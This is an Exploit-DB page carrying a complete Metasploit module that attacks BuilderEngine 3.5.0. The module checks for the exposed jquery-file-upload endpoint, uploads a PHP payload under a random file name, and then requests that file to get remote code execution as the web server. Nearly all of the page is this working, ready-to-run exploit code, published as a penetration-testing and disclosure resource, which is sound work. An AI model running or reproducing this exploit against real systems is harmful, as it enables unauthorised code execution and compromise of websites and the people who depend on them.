BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)

EDB-ID:

42025

CVE:

N/A

EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

PHP

Date:

2017-05-17

Vulnerable App: 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "BuilderEngine Arbitrary File Upload Vulnerability and execution",
      'Description'    => %q{
        This module exploits a vulnerability found in BuilderEngine 3.5.0
        via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious
        file, which would result in arbitrary remote code execution under the context of
        the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metanubix',   # PoC
          'Marco Rivoli' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '40390']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['BuilderEngine 3.5.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 18 2016",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])
        ])
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')
    })

    if res && res.code == 200 && !res.body.blank?
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path

    peer = "#{rhost}:#{rport}"
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    data = Rex::MIME::Message.new
    payload_encoded = Rex::Text.rand_text_alpha(1)
    payload_encoded << "<?php "
    payload_encoded << payload.encoded
    payload_encoded << " ?>\r\n"
    data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'uri'    => normalize_uri(uri,'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if res
      if res.code == 200 && res.body =~ /files|#{php_pagename}/
        print_good("Our payload is at: #{php_pagename}. Calling payload...")
        register_file_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end

    print_status("Calling payload...")
    send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(uri,'files/', php_pagename)
    )
  end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services